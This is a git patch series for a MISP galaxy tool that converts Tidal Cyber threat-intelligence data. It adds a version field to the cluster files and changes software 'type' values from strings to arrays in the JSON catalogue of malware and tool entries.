5 Mar 2024 15:33:10 +0100 Subject: [PATCH 39/49] Fix [galaxies] add version --- clusters/tidal-campaigns.json | 3 ++- clusters/tidal-groups.json | 3 ++- clusters/tidal-references.json | 3 ++- clusters/tidal-software.json | 3 ++- clusters/tidal-tactic.json | 3 ++- clusters/tidal-technique.json | 3 ++- tools/tidal-api/main.py | 10 ++++++---- tools/tidal-api/models/cluster.py | 21 +++++++++++++++------ 8 files changed, 33 insertions(+), 16 deletions(-) diff --git a/clusters/tidal-campaigns.json b/clusters/tidal-campaigns.json index ba36260..0c0636d 100644 --- a/clusters/tidal-campaigns.json +++ b/clusters/tidal-campaigns.json @@ -642,5 +642,6 @@ "uuid": "8bde8146-0656-5800-82e6-e24e008e4f4a", "value": "SolarWinds Compromise" } - ] + ], + "version": 1 } diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json index 53185a4..2543872 100644 --- a/clusters/tidal-groups.json +++ b/clusters/tidal-groups.json @@ -10488,5 +10488,6 @@ "uuid": "5e34409e-2f55-4384-b519-80747d02394c", "value": "ZIRCONIUM" } - ] + ], + "version": 1 } diff --git a/clusters/tidal-references.json b/clusters/tidal-references.json index e084937..39b4552 100644 --- a/clusters/tidal-references.json +++ b/clusters/tidal-references.json @@ -57458,5 +57458,6 @@ "uuid": "4922dbb5-d3fd-4bf2-8af7-3b8889579c31", "value": "Sysdig Kinsing November 2020" } - ] + ], + "version": 1 } diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json index 6cf642b..5cf5020 100644 --- a/clusters/tidal-software.json +++ b/clusters/tidal-software.json @@ -33305,5 +33305,6 @@ "uuid": "91e1ee26-d6ae-4203-a466-93c9e5019b47", "value": "ZxxZ" } - ] + ], + "version": 1 } diff --git a/clusters/tidal-tactic.json b/clusters/tidal-tactic.json index aaf9e9b..3432967 100644 --- a/clusters/tidal-tactic.json +++ b/clusters/tidal-tactic.json @@ -3425,5 +3425,6 @@ "uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", "value": "Impact" } - ] + ], + "version": 1 } diff --git a/clusters/tidal-technique.json b/clusters/tidal-technique.json index f7e47b4..d626c9b 100644 --- a/clusters/tidal-technique.json +++ b/clusters/tidal-technique.json @@ -12734,5 +12734,6 @@ "uuid": "4eb755e6-41f1-4c92-b14d-87a61a446258", "value": "XSL Script Processing" } - ] + ], + "version": 1 } diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index 469c164..a95f9b1 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -38,29 +38,31 @@ def create_galaxy( uuid=galaxy.uuid, enrichment=extended_relations, subs=create_subs, + version=version, ) cluster.add_values(data) case "software": cluster = SoftwareCluster( **config["cluster"], uuid=galaxy.uuid, + version=version, enrichment=extended_relations, subs=create_subs, ) cluster.add_values(data) case "campaigns": - cluster = CampaignsCluster(**config["cluster"], uuid=galaxy.uuid) + cluster = CampaignsCluster(**config["cluster"], uuid=galaxy.uuid, version=version) cluster.add_values(data) case "technique": cluster = TechniqueCluster( - **config["cluster"], uuid=galaxy.uuid, subs=create_subs + **config["cluster"], uuid=galaxy.uuid, subs=create_subs, version=version ) cluster.add_values(data) case "tactic": - cluster = TacticCluster(**config["cluster"], uuid=galaxy.uuid) + cluster = TacticCluster(**config["cluster"], uuid=galaxy.uuid, version=version) cluster.add_values(data) case "references": - cluster = ReferencesCluster(**config["cluster"], uuid=galaxy.uuid) + cluster = ReferencesCluster(**config["cluster"], uuid=galaxy.uuid, version=version) cluster.add_values(data) case _: print("Error: Invalid endpoint") diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 1877d04..9d7594f 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -114,6 +114,7 @@ class Cluster: source: str, type: str, uuid: str, + version: int, ): self.authors = authors self.category = category @@ -122,6 +123,7 @@ class Cluster: self.source = source self.type = type self.uuid = uuid + self.version = version self.values = [] self.CLUSTER_PATH = "../../clusters" @@ -145,6 +147,7 @@ class Cluster: "type": self.type, "uuid": self.uuid, "values": self.values, + "version": self.version, } def _get_relation_from_mitre_id( @@ -176,10 +179,11 @@ class GroupCluster(Cluster): source: str, type: str, uuid: str, + version: int, enrichment: bool = False, subs: bool = False, ): - super().__init__(authors, category, description, name, source, type, uuid) + super().__init__(authors, category, description, name, source, type, uuid, version) self.enrichment = enrichment self.subs = subs @@ -263,10 +267,11 @@ class SoftwareCluster(Cluster): source: str, type: str, uuid: str, + version: int, enrichment: bool = False, subs: bool = False, ): - super().__init__(authors, category, description, name, source, type, uuid) + super().__init__(authors, category, description, name, source, type, uuid, version) self.enrichment = enrichment self.subs = subs @@ -361,9 +366,10 @@ class TechniqueCluster(Cluster): source: str, type: str, uuid: str, + version: int, subs: bool = False, ): - super().__init__(authors, category, description, name, source, type, uuid) + super().__init__(authors, category, description, name, source, type, uuid, version) self.subs = subs def add_values(self, data): @@ -432,8 +438,9 @@ class TacticCluster(Cluster): source: str, type: str, uuid: str, + version: int, ): - super().__init__(authors, category, description, name, source, type, uuid) + super().__init__(authors, category, description, name, source, type, uuid, version) def add_values(self, data): for entry in data["data"]: @@ -472,8 +479,9 @@ class ReferencesCluster(Cluster): source: str, type: str, uuid: str, + version: int, ): - super().__init__(authors, category, description, name, source, type, uuid) + super().__init__(authors, category, description, name, source, type, uuid, version) def add_values(self, data): for entry in data["data"]: @@ -506,8 +514,9 @@ class CampaignsCluster(Cluster): source: str, type: str, uuid: str, + version: int, ): - super().__init__(authors, category, description, name, source, type, uuid) + super().__init__(authors, category, description, name, source, type, uuid, version) def add_values(self, data): for entry in data["data"]: From 2b383338f0ef012b1615fc82bb8ee670a5f6163e Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 15:46:35 +0100 Subject: [PATCH 40/49] Fix [software] type as array --- clusters/tidal-software.json | 3668 +++++++++++++++++++++-------- tools/tidal-api/models/cluster.py | 4 +- 2 files changed, 2753 insertions(+), 919 deletions(-) diff --git a/clusters/tidal-software.json b/clusters/tidal-software.json index 5cf5020..e096371 100644 --- a/clusters/tidal-software.json +++ b/clusters/tidal-software.json @@ -20,7 +20,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -46,7 +48,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -97,7 +101,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -130,7 +136,9 @@ "c9c73000-30a5-4a16-8c8b-79169f9c24aa", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -156,7 +164,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -200,7 +210,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -223,7 +235,9 @@ "tags": [ "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -242,7 +256,9 @@ ], "software_attack_id": "S1028", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -265,7 +281,9 @@ ], "software_attack_id": "S0202", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -309,7 +327,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -339,7 +359,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -415,7 +437,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -445,7 +469,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -479,7 +505,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -525,7 +553,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -566,7 +596,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -646,7 +678,9 @@ "16b47583-1c54-431f-9f09-759df7b5ddb7", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -689,7 +723,9 @@ "e809d252-12cc-494d-94f5-954c49eb87ce", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -729,7 +765,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -752,7 +790,9 @@ "16b47583-1c54-431f-9f09-759df7b5ddb7", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -782,7 +822,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -823,7 +865,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -846,7 +890,9 @@ ], "software_attack_id": "S1074", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -878,7 +924,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -947,7 +995,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -972,7 +1022,9 @@ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -999,7 +1051,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1043,7 +1097,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1062,7 +1118,9 @@ ], "software_attack_id": "S0456", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1104,7 +1162,9 @@ "tags": [ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1168,7 +1228,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1204,7 +1266,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1260,7 +1324,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1287,7 +1353,9 @@ "fdd53e62-5bf1-41f1-8bd6-b970a866c39d", "d431939f-2dc0-410b-83f7-86c458125444" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1335,7 +1403,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1392,7 +1462,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1427,7 +1499,9 @@ "992bdd33-4a47-495d-883a-58010a2f0efb", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1462,7 +1536,9 @@ ], "software_attack_id": "S0438", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1495,7 +1571,9 @@ ], "software_attack_id": "S0347", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1522,7 +1600,9 @@ ], "software_attack_id": "S0129", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1552,7 +1632,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1579,7 +1661,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1601,7 +1685,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1634,7 +1720,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1656,7 +1744,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1719,7 +1809,9 @@ "7e7b0c67-bb85-4996-a289-da0e792d7172", "a2e000da-8181-4327-bacd-32013dbd3654" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1749,7 +1841,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1775,7 +1869,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1812,7 +1908,9 @@ ], "software_attack_id": "S0093", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1856,7 +1954,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1894,7 +1994,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -1913,7 +2015,9 @@ ], "software_attack_id": "S0245", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1939,7 +2043,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1962,7 +2068,9 @@ ], "software_attack_id": "S1081", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -1985,7 +2093,9 @@ ], "software_attack_id": "S0128", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2008,7 +2118,9 @@ ], "software_attack_id": "S0337", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2046,7 +2158,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2076,7 +2190,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2116,7 +2232,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2164,7 +2282,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -2194,7 +2314,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -2245,7 +2367,9 @@ "818c3d93-c010-44f4-82bc-b63b4bc6c3c2", "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2287,7 +2411,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2310,7 +2436,9 @@ ], "software_attack_id": "S0127", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2332,7 +2460,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2372,7 +2502,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -2397,7 +2529,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2416,7 +2550,9 @@ ], "software_attack_id": "S0017", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2442,7 +2578,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2497,7 +2635,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2551,7 +2691,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -2606,7 +2748,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2660,7 +2804,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2699,7 +2845,9 @@ ], "software_attack_id": "S0069", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2744,7 +2892,9 @@ ], "software_attack_id": "S0089", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2771,7 +2921,9 @@ ], "software_attack_id": "S0564", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2794,7 +2946,9 @@ ], "software_attack_id": "S0520", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2827,7 +2981,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -2881,7 +3037,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2904,7 +3062,9 @@ ], "software_attack_id": "S0486", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2923,7 +3083,9 @@ ], "software_attack_id": "S0360", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2949,7 +3111,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2975,7 +3139,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -2998,7 +3164,9 @@ ], "software_attack_id": "S0114", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3020,7 +3188,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3043,7 +3213,9 @@ ], "software_attack_id": "S0252", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3066,7 +3238,9 @@ ], "software_attack_id": "S0204", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3103,7 +3277,9 @@ ], "software_attack_id": "S1063", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -3130,7 +3306,9 @@ ], "software_attack_id": "S0014", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3166,7 +3344,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3196,7 +3376,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3224,7 +3406,9 @@ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3264,7 +3448,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3287,7 +3473,9 @@ ], "software_attack_id": "S0119", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -3313,7 +3501,9 @@ "tags": [ "2e621fc5-dea4-4cb9-987e-305845986cd3" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3332,7 +3522,9 @@ ], "software_attack_id": "S0454", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3355,7 +3547,9 @@ ], "software_attack_id": "S0025", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3378,7 +3572,9 @@ ], "software_attack_id": "S0274", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3397,7 +3593,9 @@ ], "software_attack_id": "S0077", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3420,7 +3618,9 @@ ], "software_attack_id": "S0351", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3457,7 +3657,9 @@ ], "software_attack_id": "S0030", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3488,7 +3690,9 @@ ], "software_attack_id": "S0484", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3507,7 +3711,9 @@ ], "software_attack_id": "S0335", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3533,7 +3739,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3555,7 +3763,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -3574,7 +3784,9 @@ ], "software_attack_id": "S0462", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3593,7 +3805,9 @@ ], "software_attack_id": "S0261", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3619,7 +3833,9 @@ "tags": [ "311abf64-a9cc-4c6a-b778-32c5df5658be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3647,7 +3863,9 @@ "tags": [ "62bde669-3020-4682-be68-36c83b2588a4" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3669,7 +3887,9 @@ "tags": [ "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3688,7 +3908,9 @@ ], "software_attack_id": "S1043", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3729,7 +3951,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -3770,7 +3994,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -3811,7 +4037,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -3857,7 +4085,9 @@ "84615fe0-c2a5-4e07-8957-78ebc29b4635", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -3931,7 +4161,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3954,7 +4186,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -3976,7 +4210,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4027,7 +4263,9 @@ ], "software_attack_id": "S0144", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4058,7 +4296,9 @@ ], "software_attack_id": "S0107", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4081,7 +4321,9 @@ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", "311abf64-a9cc-4c6a-b778-32c5df5658be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4128,7 +4370,9 @@ ], "software_attack_id": "S1041", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4153,7 +4397,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4187,7 +4433,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4281,7 +4529,9 @@ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4327,7 +4577,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4346,7 +4598,9 @@ ], "software_attack_id": "S0660", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4390,7 +4644,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4430,7 +4686,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4470,7 +4728,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4501,7 +4761,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4555,7 +4817,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -4605,7 +4869,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4782,7 +5048,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4827,7 +5095,9 @@ 